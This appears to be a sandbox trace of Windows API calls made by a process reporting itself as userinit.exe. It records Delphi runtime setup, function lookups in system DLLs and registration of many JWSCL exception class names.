[0169.881] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009
[0169.881] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0169.881] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0169.881] GetDC (hWnd=0x0) returned 0x6f01071a
[0169.881] GetDeviceCaps (hdc=0x6f01071a, index=90) returned 96
[0169.881] ReleaseDC (hWnd=0x0, hDC=0x6f01071a) returned 1
[0169.881] GetProcAddress (hModule=0x757b0000, lpProcName="EnumDisplayMonitors") returned 0x757c34a3
[0169.881] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x2889a60, dwData=0x295156c) returned 1
[0169.881] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x1af7fb, fWinIni=0x0 | out: pvParam=0x1af7fb) returned 1
[0169.881] CreateFontIndirectA (lplf=0x1af7fb) returned 0x3a0a0851
[0169.882] GetObjectA (in: h=0x3a0a0851, c=60, pv=0x1af5ec | out: pv=0x1af5ec) returned 60
[0169.882] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x1af6a7, fWinIni=0x0 | out: pvParam=0x1af6a7) returned 1
[0169.882] CreateFontIndirectA (lplf=0x1af783) returned 0x550a07e1
[0169.882] GetObjectA (in: h=0x550a07e1, c=60, pv=0x1af5ec | out: pv=0x1af5ec) returned 60
[0169.882] CreateFontIndirectA (lplf=0x1af747) returned 0x230a088d
[0169.882] GetObjectA (in: h=0x230a088d, c=60, pv=0x1af5ec | out: pv=0x1af5ec) returned 60
[0169.882] LoadIconA (hInstance=0x0, lpIconName="MAINICON") returned 0x0
[0169.882] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1af75b, nSize=0x100 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0169.882] OemToCharA (in: pSrc="C:\\Windows\\System32\\userinit.exe", pDst=0x1af75b | out: pDst="C:\\Windows\\System32\\userinit.exe") returned 1
[0169.882] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x160000
[0169.883] GetKeyboardLayoutList (in: nBuff=64, lpList=0x1af6dc | out: lpList=0x1af6dc) returned 1
[0169.884] GetModuleHandleA (lpModuleName="USER32") returned 0x757b0000
[0169.884] GetProcAddress (hModule=0x757b0000, lpProcName="AnimateWindow") returned 0x757e0620
[0169.884] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x6d720000
[0169.884] GetProcAddress (hModule=0x6d720000, lpProcName="InitializeFlatSB") returned 0x6d75266f
[0169.884] GetProcAddress (hModule=0x6d720000, lpProcName="UninitializeFlatSB") returned 0x6d752542
[0169.884] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_GetScrollProp") returned 0x6d751d29
[0169.885] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_SetScrollProp") returned 0x6d75238d
[0169.885] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_EnableScrollBar") returned 0x6d7520c9
[0169.885] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_ShowScrollBar") returned 0x6d751fdb
[0169.885] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_GetScrollRange") returned 0x6d751e8d
[0169.885] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_GetScrollInfo") returned 0x6d751f0f
[0169.885] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_GetScrollPos") returned 0x6d751ccd
[0169.885] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_SetScrollPos") returned 0x6d75216d
[0169.926] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_SetScrollInfo") returned 0x6d7522be
[0169.926] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_SetScrollRange") returned 0x6d7521e2
[0169.926] GetModuleHandleA (lpModuleName="User32.dll") returned 0x757b0000
[0169.927] GetProcAddress (hModule=0x757b0000, lpProcName="SetLayeredWindowAttributes") returned 0x757ba6dc
[0169.927] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc078
[0169.927] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76a20000
[0169.927] GetProcAddress (hModule=0x76a20000, lpProcName="CoCreateInstanceEx") returned 0x76a69d4e
[0169.927] GetProcAddress (hModule=0x76a20000, lpProcName="CoInitializeEx") returned 0x76a609ad
[0169.927] GetProcAddress (hModule=0x76a20000, lpProcName="CoAddRefServerProcess") returned 0x76a83cf3
[0169.927] GetProcAddress (hModule=0x76a20000, lpProcName="CoReleaseServerProcess") returned 0x76a84314
[0169.927] GetProcAddress (hModule=0x76a20000, lpProcName="CoResumeClassObjects") returned 0x76a2ea02
[0169.927] GetProcAddress (hModule=0x76a20000, lpProcName="CoSuspendClassObjects") returned 0x76a8bb02
[0169.927] LoadStringA (in: hInstance=0x2830000, uID=0xff59, lpBuffer=0x1af43c, cchBufferMax=1024 | out: lpBuffer="Metafiles") returned 0x9
[0169.927] CharLowerBuffA (in: lpsz="wmf", cchLength=0x3 | out: lpsz="wmf") returned 0x3
[0169.927] LoadStringA (in: hInstance=0x2830000, uID=0xff5a, lpBuffer=0x1af43c, cchBufferMax=1024 | out: lpBuffer="Enhanced Metafiles") returned 0x12
[0169.927] CharLowerBuffA (in: lpsz="emf", cchLength=0x3 | out: lpsz="emf") returned 0x3
[0169.927] LoadStringA (in: hInstance=0x2830000, uID=0xff5b, lpBuffer=0x1af43c, cchBufferMax=1024 | out: lpBuffer="Icons") returned 0x5
[0169.927] CharLowerBuffA (in: lpsz="ico", cchLength=0x3 | out: lpsz="ico") returned 0x3
[0169.927] LoadStringA (in: hInstance=0x2830000, uID=0xff5c, lpBuffer=0x1af43c, cchBufferMax=1024 | out: lpBuffer="Bitmaps") returned 0x7
[0169.928] CharLowerBuffA (in: lpsz="bmp", cchLength=0x3 | out: lpsz="bmp") returned 0x3
[0169.928] SetErrorMode (uMode=0x8000) returned 0x1
[0169.928] LoadLibraryA (lpLibFileName="olepro32.dll") returned 0x6d820000
[0169.930] SetErrorMode (uMode=0x1) returned 0x8000
[0169.930] GetProcAddress (hModule=0x6d820000, lpProcName="OleCreatePropertyFrame") returned 0x6d8220ea
[0169.930] GetProcAddress (hModule=0x6d820000, lpProcName="OleCreateFontIndirect") returned 0x6d8220b7
[0169.930] GetProcAddress (hModule=0x6d820000, lpProcName="OleCreatePictureIndirect") returned 0x6d8220c8
[0169.930] GetProcAddress (hModule=0x6d820000, lpProcName="OleLoadPicture") returned 0x6d8220d9
[0169.930] SysReAllocStringLen (in: pbstr=0x291fa98*=0x0, psz="EJwsclUnsupportedException", len=0x1a | out: pbstr=0x291fa98*="EJwsclUnsupportedException") returned 1
[0169.931] SysReAllocStringLen (in: pbstr=0x291fa80*=0x0, psz="EJwsclPIDException", len=0x12 | out: pbstr=0x291fa80*="EJwsclPIDException") returned 1
[0169.931] SysReAllocStringLen (in: pbstr=0x291fa68*=0x0, psz="EJwsclJwShellExecuteException", len=0x1d | out: pbstr=0x291fa68*="EJwsclJwShellExecuteException") returned 1
[0169.931] SysReAllocStringLen (in: pbstr=0x291fa50*=0x0, psz="EJwsclShellExecuteException", len=0x1b | out: pbstr=0x291fa50*="EJwsclShellExecuteException") returned 1
[0169.931] SysReAllocStringLen (in: pbstr=0x291fa38*=0x0, psz="EJwsclElevationException", len=0x18 | out: pbstr=0x291fa38*="EJwsclElevationException") returned 1
[0169.931] SysReAllocStringLen (in: pbstr=0x291fa20*=0x0, psz="EJwsclAbortException", len=0x14 | out: pbstr=0x291fa20*="EJwsclAbortException") returned 1
[0169.931] SysReAllocStringLen (in: pbstr=0x291fa08*=0x0, psz="EJwsclSuRunErrorException", len=0x19 | out: pbstr=0x291fa08*="EJwsclSuRunErrorException") returned 1
[0169.931] SysReAllocStringLen (in: pbstr=0x291f9f0*=0x0, psz="EJwsclElevateProcessException", len=0x1d | out: pbstr=0x291f9f0*="EJwsclElevateProcessException") returned 1
[0169.931] SysReAllocStringLen (in: pbstr=0x291f9d8*=0x0, psz="EJwsclCertApiException", len=0x16 | out: pbstr=0x291f9d8*="EJwsclCertApiException") returned 1
[0169.931] SysReAllocStringLen (in: pbstr=0x291f9c0*=0x0, psz="EJwsclVistaFeaturesDisabled", len=0x1b | out: pbstr=0x291f9c0*="EJwsclVistaFeaturesDisabled") returned 1
[0169.931] SysReAllocStringLen (in: pbstr=0x291f9a8*=0x0, psz="EJwsclInvalidStartupInfo", len=0x18 | out: pbstr=0x291f9a8*="EJwsclInvalidStartupInfo") returned 1
[0169.931] SysReAllocStringLen (in: pbstr=0x291f990*=0x0, psz="EJwsclFirewallNoExceptionsException", len=0x23 | out: pbstr=0x291f990*="EJwsclFirewallNoExceptionsException") returned 1
[0169.931] SysReAllocStringLen (in: pbstr=0x291f978*=0x0, psz="EJwsclFirewallInactiveException", len=0x1f | out: pbstr=0x291f978*="EJwsclFirewallInactiveException") returned 1
[0169.931] SysReAllocStringLen (in: pbstr=0x291f960*=0x0, psz="EJwsclFirewallDelRuleException", len=0x1e | out: pbstr=0x291f960*="EJwsclFirewallDelRuleException") returned 1
[0169.931] SysReAllocStringLen (in: pbstr=0x291f948*=0x0, psz="EJwsclAddUdpPortToFirewallException", len=0x23 | out: pbstr=0x291f948*="EJwsclAddUdpPortToFirewallException") returned 1
[0169.931] SysReAllocStringLen (in: pbstr=0x291f930*=0x0, psz="EJwsclAddTcpPortToFirewallException", len=0x23 | out: pbstr=0x291f930*="EJwsclAddTcpPortToFirewallException") returned 1
[0169.931] SysReAllocStringLen (in: pbstr=0x291f918*=0x0, psz="EJwsclFirewallAddRuleException", len=0x1e | out: pbstr=0x291f918*="EJwsclFirewallAddRuleException") returned 1
[0169.931] SysReAllocStringLen (in: pbstr=0x291f900*=0x0, psz="EJwsclSetRemoteAdminAdressException", len=0x23 | out: pbstr=0x291f900*="EJwsclSetRemoteAdminAdressException") returned 1
[0169.931] SysReAllocStringLen (in: pbstr=0x291f8e8*=0x0, psz="EJwsclGetRemoteAdminAdressException", len=0x23 | out: pbstr=0x291f8e8*="EJwsclGetRemoteAdminAdressException") returned 1
[0169.931] SysReAllocStringLen (in: pbstr=0x291f8d0*=0x0, psz="EJwsclSetRemoteAdminAllowedException", len=0x24 | out: pbstr=0x291f8d0*="EJwsclSetRemoteAdminAllowedException") returned 1
[0169.931] SysReAllocStringLen (in: pbstr=0x291f8b8*=0x0, psz="EJwsclGetRemoteAdminAllowedException", len=0x24 | out: pbstr=0x291f8b8*="EJwsclGetRemoteAdminAllowedException") returned 1
[0169.931] SysReAllocStringLen (in: pbstr=0x291f8a0*=0x0, psz="EJwsclSetIncomingPingAllowedException", len=0x25 | out: pbstr=0x291f8a0*="EJwsclSetIncomingPingAllowedException") returned 1
[0169.931] SysReAllocStringLen (in: pbstr=0x291f888*=0x0, psz="EJwsclGetIncomingPingAllowedException", len=0x25 | out: pbstr=0x291f888*="EJwsclGetIncomingPingAllowedException") returned 1
[0169.931] SysReAllocStringLen (in: pbstr=0x291f870*=0x0, psz="EJwsclSetFWExceptionsAllowedException", len=0x25 | out: pbstr=0x291f870*="EJwsclSetFWExceptionsAllowedException") returned 1
[0169.931] SysReAllocStringLen (in: pbstr=0x291f858*=0x0, psz="EJwsclGetFWExceptionsAllowedException", len=0x25 | out: pbstr=0x291f858*="EJwsclGetFWExceptionsAllowedException") returned 1
[0169.931] SysReAllocStringLen (in: pbstr=0x291f840*=0x0, psz="EJwsclGetFWStateException", len=0x19 | out: pbstr=0x291f840*="EJwsclGetFWStateException") returned 1
[0169.931] SysReAllocStringLen (in: pbstr=0x291f828*=0x0, psz="EJwsclSetFWStateException", len=0x19 | out: pbstr=0x291f828*="EJwsclSetFWStateException") returned 1
[0169.931] SysReAllocStringLen (in: pbstr=0x291f810*=0x0, psz="EJwsclFirewallProfileInitException", len=0x22 | out: pbstr=0x291f810*="EJwsclFirewallProfileInitException") returned 1
[0169.931] SysReAllocStringLen (in: pbstr=0x291f7f8*=0x0, psz="EJwsclFirewallInitException", len=0x1b | out: pbstr=0x291f7f8*="EJwsclFirewallInitException") returned 1
[0169.931] SysReAllocStringLen (in: pbstr=0x291f7e0*=0x0, psz="EJwsclGenericFirewallException", len=0x1e | out: pbstr=0x291f7e0*="EJwsclGenericFirewallException") returned 1
[0169.931] SysReAllocStringLen (in: pbstr=0x291f7c8*=0x0, psz="EJwsclEnumerateProcessFailed", len=0x1c | out: pbstr=0x291f7c8*="EJwsclEnumerateProcessFailed") returned 1
[0169.931] SysReAllocStringLen (in: pbstr=0x291f7b0*=0x0, psz="EJwsclInvalidRegistryPath", len=0x19 | out: pbstr=0x291f7b0*="EJwsclInvalidRegistryPath") returned 1
[0169.931] SysReAllocStringLen (in: pbstr=0x291f798*=0x0, psz="EJwsclEndOfStream", len=0x11 | out: pbstr=0x291f798*="EJwsclEndOfStream") returned 1
[0169.931] SysReAllocStringLen (in: pbstr=0x291f780*=0x0, psz="EJwsclClassTypeMismatch", len=0x17 | out: pbstr=0x291f780*="EJwsclClassTypeMismatch") returned 1
[0169.931] SysReAllocStringLen (in: pbstr=0x291f768*=0x0, psz="EJwsclInvalidHandle", len=0x13 | out: pbstr=0x291f768*="EJwsclInvalidHandle") returned 1
[0169.932] SysReAllocStringLen (in: pbstr=0x291f750*=0x0, psz="EJwsclInvalidIndex", len=0x12 | out: pbstr=0x291f750*="EJwsclInvalidIndex") returned 1
[0169.932] SysReAllocStringLen (in: pbstr=0x291f738*=0x0, psz="EJwsclInvalidSession", len=0x14 | out: pbstr=0x291f738*="EJwsclInvalidSession") returned 1
[0169.932] SysReAllocStringLen (in: pbstr=0x291f720*=0x0, psz="EJwsclMissingEvent", len=0x12 | out: pbstr=0x291f720*="EJwsclMissingEvent") returned 1
[0169.932] SysReAllocStringLen (in: pbstr=0x291f708*=0x0, psz="EJwsclInvalidPointerType", len=0x18 | out: pbstr=0x291f708*="EJwsclInvalidPointerType") returned 1
[0169.932] SysReAllocStringLen (in: pbstr=0x291f6f0*=0x0, psz="EJwsclCreateProcessFailed", len=0x19 | out: pbstr=0x291f6f0*="EJwsclCreateProcessFailed") returned 1
[0169.932] SysReAllocStringLen (in: pbstr=0x291f6d8*=0x0, psz="EJwsclNilPointer", len=0x10 | out: pbstr=0x291f6d8*="EJwsclNilPointer") returned 1
[0169.932] SysReAllocStringLen (in: pbstr=0x291f6c0*=0x0, psz="EJwsclUnimplemented", len=0x13 | out: pbstr=0x291f6c0*="EJwsclUnimplemented") returned 1
[0169.932] SysReAllocStringLen (in: pbstr=0x291f6a8*=0x0, psz="EJwsclInitWellKnownException", len=0x1c | out: pbstr=0x291f6a8*="EJwsclInitWellKnownException") returned 1
[0169.932] SysReAllocStringLen (in: pbstr=0x291f690*=0x0, psz="EJwsclKeyApiException", len=0x15 | out: pbstr=0x291f690*="EJwsclKeyApiException") returned 1
[0169.932] SysReAllocStringLen (in: pbstr=0x291f678*=0x0, psz="EJwsclKeyException", len=0x12 | out: pbstr=0x291f678*="EJwsclKeyException") returned 1
[0169.932] SysReAllocStringLen (in: pbstr=0x291f660*=0x0, psz="EJwsclHashApiException", len=0x16 | out: pbstr=0x291f660*="EJwsclHashApiException") returned 1
[0169.932] SysReAllocStringLen (in: pbstr=0x291f648*=0x0, psz="EJwsclHashException", len=0x13 | out: pbstr=0x291f648*="EJwsclHashException") returned 1
[0169.932] SysReAllocStringLen (in: pbstr=0x291f630*=0x0, psz="EJwsclCSPApiException", len=0x15 | out: pbstr=0x291f630*="EJwsclCSPApiException") returned 1
[0169.932] SysReAllocStringLen (in: pbstr=0x291f618*=0x0, psz="EJwsclCSPException", len=0x12 | out: pbstr=0x291f618*="EJwsclCSPException") returned 1
[0169.932] SysReAllocStringLen (in: pbstr=0x291f600*=0x0, psz="EJwsclTerminalSessionException", len=0x1e | out: pbstr=0x291f600*="EJwsclTerminalSessionException") returned 1
[0169.932] SysReAllocStringLen (in: pbstr=0x291f5e8*=0x0, psz="EJwsclTerminalServiceNecessary", len=0x1e | out: pbstr=0x291f5e8*="EJwsclTerminalServiceNecessary") returned 1
[0169.932] SysReAllocStringLen (in: pbstr=0x291f5d0*=0x0, psz="EJwsclTerminalServiceException", len=0x1e | out: pbstr=0x291f5d0*="EJwsclTerminalServiceException") returned 1
[0169.932] SysReAllocStringLen (in: pbstr=0x291f5b8*=0x0, psz="EJwsclTerminalServerConnectException", len=0x24 | out: pbstr=0x291f5b8*="EJwsclTerminalServerConnectException") returned 1
[0169.932] SysReAllocStringLen (in: pbstr=0x291f5a0*=0x0, psz="EJwsclTerminalServerException", len=0x1d | out: pbstr=0x291f5a0*="EJwsclTerminalServerException") returned 1
[0169.932] SysReAllocStringLen (in: pbstr=0x291f588*=0x0, psz="EJwsclCryptUnsupportedException", len=0x1f | out: pbstr=0x291f588*="EJwsclCryptUnsupportedException") returned 1
[0169.932] SysReAllocStringLen (in: pbstr=0x291f570*=0x0, psz="EJwsclCryptApiException", len=0x17 | out: pbstr=0x291f570*="EJwsclCryptApiException") returned 1
[0169.932] SysReAllocStringLen (in: pbstr=0x291f558*=0x0, psz="EJwsclCryptException", len=0x14 | out: pbstr=0x291f558*="EJwsclCryptException") returned 1
[0169.932] SysReAllocStringLen (in: pbstr=0x291f540*=0x0, psz="EJwsclOSError", len=0xd | out: pbstr=0x291f540*="EJwsclOSError") returned 1
[0169.932] SysReAllocStringLen (in: pbstr=0x291f528*=0x0, psz="EJwsclResourceInitFailed", len=0x18 | out: pbstr=0x291f528*="EJwsclResourceInitFailed") returned 1
[0169.932] SysReAllocStringLen (in: pbstr=0x291f510*=0x0, psz="EJwsclResourceUnequalCount", len=0x1a | out: pbstr=0x291f510*="EJwsclResourceUnequalCount") returned 1
[0169.932] SysReAllocStringLen (in: pbstr=0x291f4f8*=0x0, psz="EJwsclResourceNotFound", len=0x16 | out: pbstr=0x291f4f8*="EJwsclResourceNotFound") returned 1
[0169.932] SysReAllocStringLen (in: pbstr=0x291f4e0*=0x0, psz="EJwsclResourceException", len=0x17 | out: pbstr=0x291f4e0*="EJwsclResourceException") returned 1
[0169.932] SysReAllocStringLen (in: pbstr=0x291f4c8*=0x0, psz="EJwsclFailedAddACE", len=0x12 | out: pbstr=0x291f4c8*="EJwsclFailedAddACE") returned 1
[0169.932] SysReAllocStringLen (in: pbstr=0x291f4b0*=0x0, psz="EJwsclUnsupportedACE", len=0x14 | out: pbstr=0x291f4b0*="EJwsclUnsupportedACE") returned 1
[0169.932] SysReAllocStringLen (in: pbstr=0x291f498*=0x0, psz="EJwsclOpenWindowStationException", len=0x20 | out: pbstr=0x291f498*="EJwsclOpenWindowStationException") returned 1
[0169.932] SysReAllocStringLen (in: pbstr=0x291f480*=0x0, psz="EJwsclWindowStationException", len=0x1c | out: pbstr=0x291f480*="EJwsclWindowStationException") returned 1
[0169.932] SysReAllocStringLen (in: pbstr=0x291f468*=0x0, psz="EJwsclCloseDesktopException", len=0x1b | out: pbstr=0x291f468*="EJwsclCloseDesktopException") returned 1
[0169.932] SysReAllocStringLen (in: pbstr=0x291f450*=0x0, psz="EJwsclCreateDesktopException", len=0x1c | out: pbstr=0x291f450*="EJwsclCreateDesktopException") returned 1
[0169.932] SysReAllocStringLen (in: pbstr=0x291f438*=0x0, psz="EJwsclOpenDesktopException", len=0x1a | out: pbstr=0x291f438*="EJwsclOpenDesktopException") returned 1
[0169.932] SysReAllocStringLen (in: pbstr=0x291f420*=0x0, psz="EJwsclDesktopException", len=0x16 | out: pbstr=0x291f420*="EJwsclDesktopException") returned 1
[0169.932] SysReAllocStringLen (in: pbstr=0x291f408*=0x0, psz="EJwsclSACLAccessDenied", len=0x16 | out: pbstr=0x291f408*="EJwsclSACLAccessDenied") returned 1
[0169.933] SysReAllocStringLen (in: pbstr=0x291f3f0*=0x0, psz="EJwsclAccessDenied", len=0x12 | out: pbstr=0x291f3f0*="EJwsclAccessDenied") returned 1
[0169.933] SysReAllocStringLen (in: pbstr=0x291f3d8*=0x0, psz="EJwsclLSAException", len=0x12 | out: pbstr=0x291f3d8*="EJwsclLSAException") returned 1
[0169.933] SysReAllocStringLen (in: pbstr=0x291f3c0*=0x0, psz="ESetOwnerException", len=0x12 | out: pbstr=0x291f3c0*="ESetOwnerException") returned 1
[0169.933] SysReAllocStringLen (in: pbstr=0x291f3a8*=0x0, psz="ESetSecurityException", len=0x15 | out: pbstr=0x291f3a8*="ESetSecurityException") returned 1
[0169.933] SysReAllocStringLen (in: pbstr=0x291f390*=0x0, psz="EJwsclInvalidParentDescriptor", len=0x1d | out: pbstr=0x291f390*="EJwsclInvalidParentDescriptor") returned 1
[0169.933] SysReAllocStringLen (in: pbstr=0x291f378*=0x0, psz="EJwsclInvalidKeyPath", len=0x14 | out: pbstr=0x291f378*="EJwsclInvalidKeyPath") returned 1
[0169.933] SysReAllocStringLen (in: pbstr=0x291f360*=0x0, psz="EJwsclInvalidGenericAccessMask", len=0x1e | out: pbstr=0x291f360*="EJwsclInvalidGenericAccessMask") returned 1
[0169.933] SysReAllocStringLen (in: pbstr=0x291f348*=0x0, psz="EJwsclAdaptSecurityInfoException", len=0x20 | out: pbstr=0x291f348*="EJwsclAdaptSecurityInfoException") returned 1
[0169.933] SysReAllocStringLen (in: pbstr=0x291f330*=0x0, psz="EJwsclThreadException", len=0x15 | out: pbstr=0x291f330*="EJwsclThreadException") returned 1
[0169.933] SysReAllocStringLen (in: pbstr=0x291f318*=0x0, psz="EJwsclInvalidObjectException", len=0x1c | out: pbstr=0x291f318*="EJwsclInvalidObjectException") returned 1
[0169.933] SysReAllocStringLen (in: pbstr=0x291f300*=0x0, psz="EJwsclSecurityObjectException", len=0x1d | out: pbstr=0x291f300*="EJwsclSecurityObjectException") returned 1
[0169.933] SysReAllocStringLen (in: pbstr=0x291f2e8*=0x0, psz="EJwsclHashMismatch", len=0x12 | out: pbstr=0x291f2e8*="EJwsclHashMismatch") returned 1
[0169.933] SysReAllocStringLen (in: pbstr=0x291f2d0*=0x0, psz="EJwsclStreamHashException", len=0x19 | out: pbstr=0x291f2d0*="EJwsclStreamHashException") returned 1
[0169.933] SysReAllocStringLen (in: pbstr=0x291f2b8*=0x0, psz="EJwsclStreamInvalidMagicException", len=0x21 | out: pbstr=0x291f2b8*="EJwsclStreamInvalidMagicException") returned 1
[0169.933] SysReAllocStringLen (in: pbstr=0x291f2a0*=0x0, psz="EJwsclStreamSizeException", len=0x19 | out: pbstr=0x291f2a0*="EJwsclStreamSizeException") returned 1
[0169.933] SysReAllocStringLen (in: pbstr=0x291f288*=0x0, psz="EJwsclStreamException", len=0x15 | out: pbstr=0x291f288*="EJwsclStreamException") returned 1
[0169.933] SysReAllocStringLen (in: pbstr=0x291f270*=0x0, psz="EJwsclNoSuchLogonSession", len=0x18 | out: pbstr=0x291f270*="EJwsclNoSuchLogonSession") returned 1
[0169.933] SysReAllocStringLen (in: pbstr=0x291f258*=0x0, psz="EJwsclInvalidFlagsException", len=0x1b | out: pbstr=0x291f258*="EJwsclInvalidFlagsException") returned 1
[0169.933] SysReAllocStringLen (in: pbstr=0x291f240*=0x0, psz="EJwsclProcessNotFound", len=0x15 | out: pbstr=0x291f240*="EJwsclProcessNotFound") returned 1
[0169.933] SysReAllocStringLen (in: pbstr=0x291f228*=0x0, psz="EJwsclInvalidParameterException", len=0x1f | out: pbstr=0x291f228*="EJwsclInvalidParameterException") returned 1
[0169.933] SysReAllocStringLen (in: pbstr=0x291f210*=0x0, psz="EJwsclInvalidPathException", len=0x1a | out: pbstr=0x291f210*="EJwsclInvalidPathException") returned 1
[0169.933] SysReAllocStringLen (in: pbstr=0x291f1f8*=0x0, psz="EJwsclInvalidSecurityDescriptor", len=0x1f | out: pbstr=0x291f1f8*="EJwsclInvalidSecurityDescriptor") returned 1
[0169.933] SysReAllocStringLen (in: pbstr=0x291f1e0*=0x0, psz="EJwsclInvalidRevision", len=0x15 | out: pbstr=0x291f1e0*="EJwsclInvalidRevision") returned 1
[0169.933] SysReAllocStringLen (in: pbstr=0x291f1c8*=0x0, psz="EJwsclInvalidAceMismatch", len=0x18 | out: pbstr=0x291f1c8*="EJwsclInvalidAceMismatch") returned 1
[0169.933] SysReAllocStringLen (in: pbstr=0x291f1b0*=0x0, psz="EJwsclRevisionMismatchException", len=0x1f | out: pbstr=0x291f1b0*="EJwsclRevisionMismatchException") returned 1
[0169.933] SysReAllocStringLen (in: pbstr=0x291f198*=0x0, psz="EJwsclInvalidACEException", len=0x19 | out: pbstr=0x291f198*="EJwsclInvalidACEException") returned 1
[0169.933] SysReAllocStringLen (in: pbstr=0x291f180*=0x0, psz="EJwsclReadOnlyPropertyException", len=0x1f | out: pbstr=0x291f180*="EJwsclReadOnlyPropertyException") returned 1
[0169.933] SysReAllocStringLen (in: pbstr=0x291f168*=0x0, psz="EJwsclDuplicateListEntryException", len=0x21 | out: pbstr=0x291f168*="EJwsclDuplicateListEntryException") returned 1
[0169.933] SysReAllocStringLen (in: pbstr=0x291f150*=0x0, psz="EJwsclIndexOutOfBoundsException", len=0x1f | out: pbstr=0x291f150*="EJwsclIndexOutOfBoundsException") returned 1
[0169.933] SysReAllocStringLen (in: pbstr=0x291f138*=0x0, psz="EJwsclInvalidSidAuthorityValue", len=0x1e | out: pbstr=0x291f138*="EJwsclInvalidSidAuthorityValue") returned 1
[0169.933] SysReAllocStringLen (in: pbstr=0x291f120*=0x0, psz="EJwsclInvalidKnownSIDException", len=0x1e | out: pbstr=0x291f120*="EJwsclInvalidKnownSIDException") returned 1
[0169.933] SysReAllocStringLen (in: pbstr=0x291f108*=0x0, psz="EJwsclInvalidComputer", len=0x15 | out: pbstr=0x291f108*="EJwsclInvalidComputer") returned 1
[0169.934] SysReAllocStringLen (in: pbstr=0x291f0f0*=0x0, psz="EJwsclInvalidGroupSIDException", len=0x1e | out: pbstr=0x291f0f0*="EJwsclInvalidGroupSIDException") returned 1
[0169.934] SysReAllocStringLen (in: pbstr=0x291f0d8*=0x0, psz="EJwsclInvalidOwnerSIDException", len=0x1e | out: pbstr=0x291f0d8*="EJwsclInvalidOwnerSIDException") returned 1
[0169.934] SysReAllocStringLen (in: pbstr=0x291f0c0*=0x0, psz="EJwsclInvalidSIDException", len=0x19 | out: pbstr=0x291f0c0*="EJwsclInvalidSIDException") returned 1
[0169.934] SysReAllocStringLen (in: pbstr=0x291f0a8*=0x0, psz="EJwsclInvalidSecurityListException", len=0x22 | out: pbstr=0x291f0a8*="EJwsclInvalidSecurityListException") returned 1
[0169.934] SysReAllocStringLen (in: pbstr=0x291f090*=0x0, psz="EJwsclInvalidMandatoryLevelException", len=0x24 | out: pbstr=0x291f090*="EJwsclInvalidMandatoryLevelException") returned 1
[0169.934] SysReAllocStringLen (in: pbstr=0x291f078*=0x0, psz="EJwsclEmptyACLException", len=0x17 | out: pbstr=0x291f078*="EJwsclEmptyACLException") returned 1
[0169.934] SysReAllocStringLen (in: pbstr=0x291f060*=0x0, psz="EJwsclNILParameterException", len=0x1b | out: pbstr=0x291f060*="EJwsclNILParameterException") returned 1
[0169.934] SysReAllocStringLen (in: pbstr=0x291f048*=0x0, psz="EJwsclInheritanceSourceNotSupportedException", len=0x2c | out: pbstr=0x291f048*="EJwsclInheritanceSourceNotSupportedException") returned 1
[0169.934] SysReAllocStringLen (in: pbstr=0x291f030*=0x0, psz="EJwsclInvalidObjectArrayException", len=0x21 | out: pbstr=0x291f030*="EJwsclInvalidObjectArrayException") returned 1
[0169.934] SysReAllocStringLen (in: pbstr=0x291f018*=0x0, psz="EJwsclProcessIdNotAvailable", len=0x1b | out: pbstr=0x291f018*="EJwsclProcessIdNotAvailable") returned 1
[0169.934] SysReAllocStringLen (in: pbstr=0x291f000*=0x0, psz="EJwsclWinCallFailedException", len=0x1c | out: pbstr=0x291f000*="EJwsclWinCallFailedException") returned 1
[0169.934] SysReAllocStringLen (in: pbstr=0x291efe8*=0x0, psz="EJwsclUnsupportedWindowsVersionException", len=0x28 | out: pbstr=0x291efe8*="EJwsclUnsupportedWindowsVersionException") returned 1
[0169.934] SysReAllocStringLen (in: pbstr=0x291efd0*=0x0, psz="EJwsclNotImplementedException", len=0x1d | out: pbstr=0x291efd0*="EJwsclNotImplementedException") returned 1
[0169.934] SysReAllocStringLen (in: pbstr=0x291efb8*=0x0, psz="EJwsclAccessTypeException", len=0x19 | out: pbstr=0x291efb8*="EJwsclAccessTypeException") returned 1
[0169.934] SysReAllocStringLen (in: pbstr=0x291efa0*=0x0, psz="EJwsclAdjustPrivilegeException", len=0x1e | out: pbstr=0x291efa0*="EJwsclAdjustPrivilegeException") returned 1
[0169.934] SysReAllocStringLen (in: pbstr=0x291ef88*=0x0, psz="EJwsclPrivilegeCheckException", len=0x1d | out: pbstr=0x291ef88*="EJwsclPrivilegeCheckException") returned 1
[0169.934] SysReAllocStringLen (in: pbstr=0x291ef70*=0x0, psz="EJwsclPrivilegeNotFoundException", len=0x20 | out: pbstr=0x291ef70*="EJwsclPrivilegeNotFoundException") returned 1
[0169.934] SysReAllocStringLen (in: pbstr=0x291ef58*=0x0, psz="EJwsclInvalidIndexPrivilegeException", len=0x24 | out: pbstr=0x291ef58*="EJwsclInvalidIndexPrivilegeException") returned 1
[0169.934] SysReAllocStringLen (in: pbstr=0x291ef40*=0x0, psz="EJwsclPrivilegeException", len=0x18 | out: pbstr=0x291ef40*="EJwsclPrivilegeException") returned 1
[0169.934] SysReAllocStringLen (in: pbstr=0x291ef28*=0x0, psz="EJwsclNotEnoughMemory", len=0x15 | out: pbstr=0x291ef28*="EJwsclNotEnoughMemory") returned 1
